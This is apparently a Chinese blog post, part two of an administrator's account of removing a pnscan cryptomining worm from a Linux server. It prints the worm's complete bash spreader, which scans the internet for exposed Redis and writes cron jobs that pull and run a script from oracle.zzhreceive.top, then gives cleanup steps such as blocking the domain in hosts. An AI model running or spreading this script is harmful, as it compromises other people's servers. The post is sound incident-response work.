pnscan 挖矿蠕虫病毒处理记(二)

最新推荐文章于 2024-01-26 14:56:05 发布
最新推荐文章于 2024-01-26 14:56:05 发布
阅读量1.1k 收藏
点赞数
分类专栏: 安全 文章标签: linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57490668/article/details/119669475
版权

在一的文章中,扫描的程序讲解了,但是真正的Boss(pnscan 挖矿)还没有解决,接下来继续:

 

机器安装了阿里云的动态感知,扫描到挖矿程序。

 查看文件,发现这是一个脚本,先不要急于清理,先研究它的运行逻辑,发现有检测机制,文件会自动下载,像这种,强烈建议做一个域名本地解释(hosts)。

#!/bin/bash
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
sleep 1
    if [ -f "/bin/ps.original" ]
    then
        ps.original -fe|grep pnscan |grep -v grep
    else
        ps -fe|grep pnscan |grep -v grep
    fi
if [ $? -ne 0 ]
then
	rm -rf .dat .shard .ranges .lan 2>/dev/null
	sleep 1
	echo 'config set dbfilename "backup.db"' > .dat
	echo 'save' >> .dat
	echo 'config set stop-writes-on-bgsave-error no' >> .dat
	echo 'flushall' >> .dat
	echo 'set backup1 "\n\n\n*/2 * * * * cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
	echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
	echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
	echo 'set backup4 "\n\n\n*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
	echo 'config set dir "/var/spool/cron/"' >> .dat
	echo 'config set dbfilename "root"' >> .dat
	echo 'save' >> .dat
	echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
	echo 'save' >> .dat
	echo 'flushall' >> .dat
	echo 'set backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
	echo 'set backup2 "\n\n\n*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
	echo 'set backup3 "\n\n\n*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
	echo 'set backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
	echo 'config set dir "/etc/cron.d/"' >> .dat
	echo 'config set dbfilename "zzh"' >> .dat
	echo 'save' >> .dat
	echo 'config set dir "/etc/"' >> .dat
	echo 'config set dbfilename "crontab"' >> .dat
	echo 'save' >> .dat
	sleep 1
	pnx=pnscan
	[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
	[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
	for z in $( seq 0 5000 | sort -R ); do
	for x in $( echo -e "47\n39\n8\n121\n106\n120\n123\n65\n3\n101\n139\n99\n63\n81\n44\n18\n119\n100\n42\n49\n118\n54\n1\n50\n114\n182\n52\n13\n34\n112\n115\n111\n116\n16\n35\n117\n124\n59\n36\n103\n82\n175\n122\n129\n45\n152\n159\n113\n15\n61\n180\n172\n157\n60\n218\n176\n58\n204\n140\n184\n150\n193\n223\n192\n75\n46\n188\n183\n222\n14\n104\n27\n221\n211\n132\n107\n43\n212\n148\n110\n62\n202\n95\n220\n154\n23\n149\n125\n210\n203\n185\n171\n146\n109\n94\n219\n134" | sort -R ); do
	for y in $( seq 0 255 | sort -R ); do
	$pnx -t256 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
	awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
	while read -r h p; do
	cat .dat | redis-cli -h $h -p $p --raw &
	done < .r.$x.$y.l
	done
	done
        done
	sleep 1
	masscan --max-rate 10000 -p6379 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard
	sleep 1
	while read -r h p; do
	cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
	done < .shard
	sleep 1
	masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges
	sleep 1
	while read -r h p; do
	cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
	done < .ranges
	sleep 1
	ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet
	sleep 1
	masscan --max-rate 10000 -p6379 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan
	sleep 1
	while read -r h p; do
	cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
	done < .lan
	sleep 60
	rm -rf .dat .shard .ranges .lan 2>/dev/null
else
	echo "root runing....."
fi

看到有下载操作,先做hosts, 不让再通讯

vim /etc/hosts

127.0.0.1 oracle.zzhreceive.top

把脚本删除 rm  \[scan\]

再把/bin/ps.original文件删除,删了之后,发现ps命令不让用

F书生
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
排查腾讯云服务器被病毒pnscan】挟持
fanxindong0620的博客
09-27 6425
一、问题发现 最新在使用腾讯云部署项目应用,具体方式为docker部署,今天早上起床发现腾讯发来一条报警信息: 二、排查过程 使用last查看最近登录信息 使用history查看历史指令 查看/etc/passwd下的账户信息 查看日志文件/var/log/secure和/var/log/message 使用top查看进程运行信息 使用netstat查看端口信息 三、解决方案 ...
定位pnscan木马全过程
JesonXiao1221的博客
06-02 772
现象:服务器出现宕机的情况 1. 查看阿里云服务器监控信息 发现外网输出流量明显有两处异常,而且异常诊断结果也显示网络会话连接数和流量都出现了异常。 2. 进入服务器查看服务运行日志 查看nacos容器运行日志 docker logs --since=“2021-03-21” --tail=“1000” -t 29fbda27392d 出现了数据库连接异常,进一步证实了网络连接资源耗尽: org.springframework.jdbc.CannotGetJdbcConnectionException:
Docker Hub上镜像发现蠕虫病毒,已导致2000台主机感染
民工哥的博客
10-21 1257
点击上方“民工哥技术之路”选择“星标”每天10点为你分享不一样的干货安全公司Palo Alto Networks威胁情报小组Unit 42发现一种新型的Graboid...
实战某高校的一次病毒的应急处置
qq_44433172的博客
09-19 1516
一次加班引发的应急处置的故事
阿里云linux服务器的一次糟糕体验-pnscan病毒
qq_37372909的博客
06-20 447
阿里云新买的linux,被安装兄弟安装后,不到一周中了pnscan病毒
一次 newinit.sh 相关病毒处理
muyu_feng的博客
09-26 4445
(ps:在这之前经历过五六次木马病毒攻击,都是搞个定时任务下载脚本,然后就拿你服务器搞事情。去年活动 我自己买了一台腾讯云服务器 100多 三年的(巨便宜,现在再也买不到 QAQ)自己玩的。然后服务器被被封了,钱倒是退了,可再也买不到这么便宜的服务起了。因为是刚弄的一台16G服务器,才部署2个项目运行几天一切正常。再次部署多实例时发现,已部署好的服务老是掉,项目日志一切正常,感觉不太正常。去查看 隐藏权限中会多了ai权限 ,它修改了很多文件权限。最后还是CPU100%的问题只能重启服务器,再看就好了。
腾讯云服务器被黑客挂pnscan病毒排查
范大的博客
10-19 1428
腾讯云服务被黑客挂载病毒,CPU负荷过高且top无法查看
2021工作录-Redis被攻击植入pnscan病毒
qq_22161527的博客
04-27 573
目录 前言 解决方案 总结 前言 为什么会被攻击那?因为线上的redis服务端口对外开放且没有设密码。为什么没有密码?也不知道原来的开发怎么想的,已经人走茶凉了。我感觉入职这几个月,解决的bug多得让人沉默。因为没人交接,用户量使用又比较多,导致每次有问题都不太好锁定。每次线上出现了问题,我都感觉这个问题解决不了了,要离职了。最后,靠着专业素养一一解决Bug。 解决方案 阶段一:初次解决 关闭了对外开发的端口,确保不会再被攻击; kill 掉正在疯狂启动的各种redis程序,先是无数.
jboss与struts漏洞解决
08-13
蠕虫病毒通过端口扫描工具pnscan大量发送请求,占用网络资源,并可能在系统中创建恶意定时任务和进程。防止此类攻击的关键在于限制不必要的服务访问,加强权限控制,关闭潜在的入口点。修复漏洞的策略包括升级JBoss...
技术研究 | JbossMiner 蠕虫分析
weixin_34138056的博客
03-21 282
前言 从2013年的诞生,到2016爆发,(MiningCryptocurrency) 的高回报率,使其成为了一把双刃剑。据外媒去年的统计,比特币的算力(Hash Rate)已在半年内翻了一翻。 当比特币全网算力已经全面进入P算力时代,也就意味着需要有相应计算能力的设备高速运转,不间断地暴力验证和工作,来支撑工们的“野心”。 自2017年11月以来...
YS-M3语音播放模块资料.zip
08-10
YS-M3语音播放模块使用注意事项以及使用手册,详细介绍了在使用过程中避免出现的大电压状况,使用时音频的命名方式,以及各种模式下如何使用该模块
一次被病毒pnscan攻击服务器的过程
王一把的博客
07-21 938
服务器之前运行的很好,突然内存使用无故暴涨,且top命令无法看出哪里在消耗,病毒隐藏的很深啊。 这个样子: 直接导致我无法部署正常的服务。 然后去服务监测面板看情况: 在11.30分左右,这个读写率突然加大 排查服务器发现/usr/local/bin下有个文件 11:29分时候被植入这个文件,这就是病毒文件pnscan,用来病毒。 再看root/.ssh下莫名其妙的多了2个key 这个key就是黑客攻击植入电脑的免登陆的鉴权key,直接ssh免密登录。牛批啊。 ...
一次惨痛的教训:被pnscan病毒攻击的经过
热门推荐
Alien-Hu
01-14 1万+
文章目录0.案发情况1.案发原因2.排查过程1.痛点一:多个攻击的脚本导致CPU完全被占用2.痛点二:top、ps、crontab等多个脚本文件被串改3.痛点三:crontab 定时任务脚本被感染3.总结:4.附录:核心攻击脚本 0.案发情况 pnscan病毒感染惨状: 使用top & ps & netstat 等等命令,都无法正常使用 CPU基本100%,时不时网络中断 redis端口6379被大规则线程占用 通过lsof -i:6379 查看进程,发现进程id一直在变动 rm -r
云服务器 ps,top 命令查询异常(结果为空也是)
X_161636的博客
10-30 1220
ps,top命令查询的结果 报错或者 无结果(查看/usr/bin/ps*文件)
录腾讯云服务器被植入pnscan病毒折磨的一天
weixin_61077098的博客
06-06 772
pnscan病毒非常狡猾,启动的进程号是动态的,导致不能轻易删除。还有文件删除后没多久又出现了多半是因为定时计划。虽然问题解决了,但并不知道服务器还有没有被修改的命令和一些恶意文件,如果不是很重要的服务器项目,建议备份数据重装服务器,并且不能轻易的把端口号防火墙放开,MySQL、redis等密码也要加大难度。2023年5月22日,建议大家直接重装系统,或者备份的镜像快照回滚。因为今天又出现30多次黑客的攻击,cpu直接100%,根本查不到恶意文件和进程号。所以直接重装!!!
阿里云服务器被pnscan病毒入侵如何解决?
最新发布
m0_64344919的博客
01-26 1206
针对将SpringBoot项目打包docker镜像部署到服务器上出现的后续问题,有关2375端口开放的问题
Linux被kdevtmpfsi,pnscan病毒入侵
懒得一批的打工人博客
08-17 862
Linux被kdevtmpfsi,pnscan病毒入侵 录起因 从腾讯云刚拿了一台新服务器,第一天装好docker环境后,第二天上午就收到了来自腾讯云的短信警告。登陆平台后发现站内信 好在腾讯没有直接停用我的服务器,直接进入服务使用top观察了一会高占用进程 发现kdevtmpfsi 和 pnscan 已经把我的cpu跑满了。 pnscan病毒感染惨状: 使用top & ps & netstat 等等命令,都无法正常使用 CPU基本100%,时不时网络中断 redis端口6379
Linux minerd木马清除(续)
oarsman的专栏
07-17 3592
前两天清除了minerd木马之后,服务器一直运行良好。本来以为就这样解决问题了。结果,今天晚上,突然收到监控组的告警,说服务器再度变慢,不但cpu 100%了,就是连带宽也100%了。我晕,于是SSH上去一看,哇塞,minerd 又回来了。而且还变本加厉,连带宽都占满了。 于是,老步骤。全部清理完之后。感觉还是不对。难道是服务器又被入侵了?查了下防火墙日志,似乎没有问题。SSH端口,密码之类的也
一次清理病毒的过程
邓邓子的博客
07-05 912
网站挂掉了,查看后台服务已宕掉,无法正常重启。在没有启动任何服务的情况下,内存已基本被耗尽: 2.查看各进程资源使用情况 看到 xmrig 占用了资源。 查看 root 文件内容: 查看 .moneroocean 目录下文件: 4.删除文件 5.杀掉 xmrig 进程 查找所有的 xmrig 进程并杀掉: 6.重启服务 最好重启下服务器再重启服务,此时服务已正常。......
Redis未授权漏洞复现,利用其实现的蠕虫脚本分析
qq_53689523的博客
05-05 835
Redis未授权漏洞复现 蠕虫脚本分析 恶意代码分析实例

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值